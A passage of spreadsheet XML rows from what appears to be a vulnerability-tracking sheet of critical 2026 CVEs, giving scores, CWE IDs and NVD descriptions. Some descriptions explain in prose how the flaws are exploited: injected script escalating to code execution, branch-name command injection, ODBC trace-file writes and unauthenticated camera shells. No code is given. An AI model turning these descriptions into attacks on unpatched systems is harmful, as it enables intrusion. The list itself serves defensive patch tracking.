        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48996</t>
        </is>
      </c>
      <c r="C427" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D427" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E427" s="5" t="inlineStr"/>
      <c r="F427" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G427" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L427" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter does not sanitize note titles, and the GeoMap note view interpolates a marker note's title into raw HTML that is rendered as innerHTML, allowing an attacker-supplied import archive to inject script that runs when the map is displayed. Because Safe import neutralizes scripts but never escapes titles, a note whose title contains an HTML event-handler payload survives the import and executes as soon as the victim opens the GeoMap that renders its marker. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48996</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51106</t>
        </is>
      </c>
      <c r="C428" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D428" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E428" s="5" t="inlineStr"/>
      <c r="F428" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-502</t>
        </is>
      </c>
      <c r="L428" s="5" t="inlineStr">
        <is>
          <t>An issue in TokTok qTox v1.18.4 allows a local attacker to cause a denial of service via the src/persistence/serialize.cpp component</t>
        </is>
      </c>
      <c r="M428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51106</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52735</t>
        </is>
      </c>
      <c r="C429" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D429" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E429" s="5" t="inlineStr"/>
      <c r="F429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>CWE-684</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, Zebra can accept a block that zcashd rejects because the P2SH signature-operation counter undercounts redeem scripts containing a disabled opcode followed by signature opcodes. In zebra-script/src/lib.rs, p2sh_input_sigop_count used the pure-Rust script::Code::sig_op_count path, whose try_fold parser stops at disabled opcodes such as OP_CODESEPARATOR and returns only the partial count accumulated before the error. The zcashd reference implementation continues static signature-operation counting through disabled opcodes, so an attacker can broadcast P2SH spends that Zebra counts below MAX_BLOCK_SIGOPS while zcashd counts above the 20,000-operation limit. If a Zebra miner includes those transactions, Zebra validators accept the block while zcashd validators reject it, creating a consensus chain split that affects network integrity and availability without requiring the attacker to produce a block. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52735</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53578</t>
        </is>
      </c>
      <c r="C430" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D430" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E430" s="5" t="inlineStr"/>
      <c r="F430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G430" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the mindMap note type, whose JSON content is stored without sanitization, allowing an attacker-supplied import archive to embed a payload that renders as arbitrary HTML. A mind map node can carry a dangerouslySetInnerHTML property that the Mind Elixir library assigns directly to a node's innerHTML, so a malicious note survives Safe import and executes script as soon as the victim opens the imported mind map. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53578</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53579</t>
        </is>
      </c>
      <c r="C431" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D431" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E431" s="5" t="inlineStr"/>
      <c r="F431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G431" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions up to and including 0.103.0, the default-on "Safe import" filter sanitizes HTML only for text notes and excludes the book note type, whose content is stored without sanitization and later rendered as HTML, allowing an attacker-supplied import archive to embed a payload that executes as script. A book note's content is routed through the same rendering path as text notes and injected into the page with jQuery's html method when the note is shown as a grid-view preview card, so a malicious note survives Safe import and runs as soon as the victim opens the containing note. On the desktop client the Electron renderer runs with Node integration enabled, so the injected JavaScript escalates from cross-site scripting to full remote code execution on the victim's machine. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53579</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53670</t>
        </is>
      </c>
      <c r="C432" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D432" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E432" s="5" t="inlineStr"/>
      <c r="F432" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, in the Prevail eBPF verifier, EbpfTransformer::add() silently skips offset-variable updates when the destination register carries a non-singleton typeset (two or more simultaneously possible pointer types). Subsequent bounds checks use the stale offset and accept out-of-bounds memory accesses, so a crafted BPF program passes verification even though it would corrupt memory at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="M432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53670</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53671</t>
        </is>
      </c>
      <c r="C433" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D433" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E433" s="5" t="inlineStr"/>
      <c r="F433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the abstract transformer in prevail treats writes through a T_CTX-typed base register as a silent no-op: do_mem_store in src/crab/ebpf_transformer.cpp only models T_STACK stores, and the checker's T_CTX bounds arm never tests AccessType::write. An attacker can craft an eBPF program that overwrites a context field (e.g., ctx-&gt;data), reload that field typed as T_PACKET, and dereference an attacker-controlled address — and prevail will report the program as safe. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="M433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53671</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55068</t>
        </is>
      </c>
      <c r="C434" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D434" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E434" s="5" t="inlineStr"/>
      <c r="F434" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G434" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H434" s="5" t="inlineStr"/>
      <c r="I434" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In 4.2.2 and earlier, the NRF RegisterNFInstance handler at PUT /nnrf-nfm/v1/nf-instances/{nfInstanceID} accepts NF Profiles without enforcing UUID format, nfStatus enum values, heartBeatTimer ranges, mandatory profile fields, or nfServices.ipEndPoints address constraints. The invalid profiles are persisted in the MongoDB NfProfile collection and returned by NFDiscover, allowing an attacker with SBI access to advertise attacker-controlled network-function endpoints and redirect control-plane signaling. This can expose credentials and signaling, alter service discovery integrity, and deny service across network functions that trust the NRF. This issue is fixed in version 4.2.3.</t>
        </is>
      </c>
      <c r="M434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55068</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55220</t>
        </is>
      </c>
      <c r="C435" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D435" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E435" s="5" t="inlineStr"/>
      <c r="F435" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="inlineStr"/>
      <c r="I435" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L435" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, Pimcore\Model\DataObject\ClassDefinition\Data\Hotspotimage::getDataFromResource() in models/DataObject/ClassDefinition/Data/Hotspotimage.php passes the field __hotspots object-store column to Pimcore\Tool\Serialize::unserialize() without an allowed-classes restriction after JSON decoding fails. An attacker with a separate capability to write crafted PHP serialized bytes into that column can instantiate available classes and trigger magic methods when an affected DataObject is loaded, which can produce arbitrary file writes or code execution through bundled gadget chains. The related ImageGallery, Block, and Video callers use the same fallback pattern, but the identified June fix changes the Hotspotimage caller only. This issue is fixed for Hotspotimage in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="M435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55220</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55378</t>
        </is>
      </c>
      <c r="C436" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D436" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E436" s="5" t="inlineStr"/>
      <c r="F436" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G436" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L436" s="5" t="inlineStr">
        <is>
          <t>JS Recon is a JavaScript enumeration and SAST tool. From 1.2.1-beta.1 until 1.3.1-beta.2, the PR Branch Checker workflow in .github/workflows/pr_checker.yml places github.head_ref and github.event.pull_request.head.repo.full_name into BRANCH_NAME and SOURCE_REPO and interpolates those untrusted values into a shell gh pr comment command. A remote user who opens a pull request can use shell metacharacters in a branch or fork name to execute commands in the GitHub Actions runner with the workflow's GITHUB_TOKEN, which has pull-requests write permission. This issue is fixed in version 1.3.1-beta.2.</t>
        </is>
      </c>
      <c r="M436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55378</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56705</t>
        </is>
      </c>
      <c r="C437" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D437" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E437" s="5" t="inlineStr"/>
      <c r="F437" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L437" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 fails to sanitize the server field before constructing a PDO DSN string, allowing unauthenticated attackers to inject ODBC parameters via semicolons. Attackers can inject TraceFile and TraceOn parameters to write PHP code to the web root, achieving remote code execution when the trace file is accessed.</t>
        </is>
      </c>
      <c r="M437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56705</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57910</t>
        </is>
      </c>
      <c r="C438" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D438" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="inlineStr"/>
      <c r="I438" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-347, CWE-494</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in the WatchGuard Agent allows an unauthenticated attacker with network access to cause the agent to execute arbitrary code with elevated privileges.</t>
        </is>
      </c>
      <c r="M438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57910</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61514</t>
        </is>
      </c>
      <c r="C439" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D439" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="inlineStr"/>
      <c r="I439" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L439" s="5" t="inlineStr">
        <is>
          <t>Puwell IP Camera firmware versions 2.x through 4.x contains an authentication bypass vulnerability that allows unauthenticated attackers to access device functions by sending protocol-conforming packets over TCP port 23456 without credentials. Attackers can exploit the unvalidated Session field in the proprietary control protocol header to access live video streams, control pan and tilt motors, activate audio functions, and remotely restart the device.</t>
        </is>
      </c>
      <c r="M439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61514</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61515</t>
        </is>
      </c>
      <c r="C440" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D440" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="inlineStr"/>
      <c r="I440" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr">
        <is>
          <t>CWE-912</t>
        </is>
      </c>
      <c r="L440" s="5" t="inlineStr">
        <is>
          <t>Puwell IP Camera firmware versions 2.x through 4.x contains an unauthenticated command injection vulnerability that allows remote attackers to execute arbitrary operating system commands by sending a crafted JSON payload to the DebugShell interface exposed on TCP port 34567. Attackers can exploit the lack of authentication and input sanitization in the binary protocol service to pass arbitrary commands directly to the underlying operating system, achieving root-level code execution and complete device compromise.</t>
        </is>
      </c>
      <c r="M440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61515</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61516</t>
        </is>
      </c>
      <c r="C441" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D441" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E441" s="5" t="inlineStr"/>
      <c r="F441" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="inlineStr"/>
      <c r="I441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L441" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an information disclosure vulnerability that allows unauthenticated attackers to retrieve the administrator password by sending a request to the sysinfo action in the web management interface without a valid session. Attackers can replay the exposed credential against the login handler to establish a fully authenticated administrator session on the device.</t>
        </is>
      </c>
      <c r="M441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62645</t>
        </is>
      </c>
      <c r="C442" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D442" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E442" s="5" t="inlineStr"/>
      <c r="F442" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="inlineStr"/>
      <c r="I442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L442" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Information is exposed through the web interface that can be used to calculate the current and past session ID numbers. This could allow an attacker to bypass the authentication and gain unauthorized access to the device.</t>
        </is>
      </c>
      <c r="M442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62647</t>
        </is>
      </c>
      <c r="C443" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D443" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E443" s="5" t="inlineStr"/>
      <c r="F443" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="inlineStr"/>
      <c r="I443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L443" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). A random number generator is used to generate security-relevant values (such as session identifiers used for authentication purposes) that is not initialized with a True Random Number Generator (TRNG), resulting in a predictable sequence of generated values. This could allow an unauthenticated remote attacker to more easily predict the generated values and impersonate a legitimate authenticated user, potentially gaining unauthorized access to the device.</t>
        </is>
      </c>
      <c r="M443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62681</t>
        </is>
      </c>
      <c r="C444" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D444" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E444" s="5" t="inlineStr"/>
      <c r="F444" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G444" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H444" s="5" t="inlineStr"/>
      <c r="I444" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L444" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, an unescaped backtick in an OpenAPI path is emitted into request URL template literals generated for axios, fetch, react-query, and SWR clients without safe encoding. This permits attacker-controlled JavaScript to be evaluated when a generated request, URL-builder, or query-key function is called, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/route.ts and route generation consumers. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62681</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62682</t>
        </is>
      </c>
      <c r="C445" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D445" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E445" s="5" t="inlineStr"/>
      <c r="F445" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G445" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H445" s="5" t="inlineStr"/>
      <c r="I445" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L445" s="5" t="inlineStr">
        <is>
          <t>Orval generates type-safe JavaScript clients in TypeScript from OpenAPI v3 and Swagger v2 specifications. Prior to 8.21.0, an unescaped backtick in servers[0].url is emitted into request URL template literals generated when output.baseUrl.getBaseUrlFromSpecification is enabled without safe encoding. This permits attacker-controlled JavaScript to be evaluated when a generated request or URL-builder function is called, resulting in code execution in the developer, CI, test, or application environment. The affected code is packages/core/src/getters/route.ts function getFullRoute. This issue is fixed in version 8.21.0.</t>
        </is>
      </c>
      <c r="M445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62682</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62928</t>
        </is>
      </c>
      <c r="C446" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D446" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E446" s="5" t="inlineStr"/>
      <c r="F446" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="inlineStr"/>
      <c r="I446" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L446" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains an OS Command Injection (CWE-78). Unauthenticated OS command may be injected.</t>
        </is>
      </c>
      <c r="M446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62928</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63106</t>
        </is>
      </c>
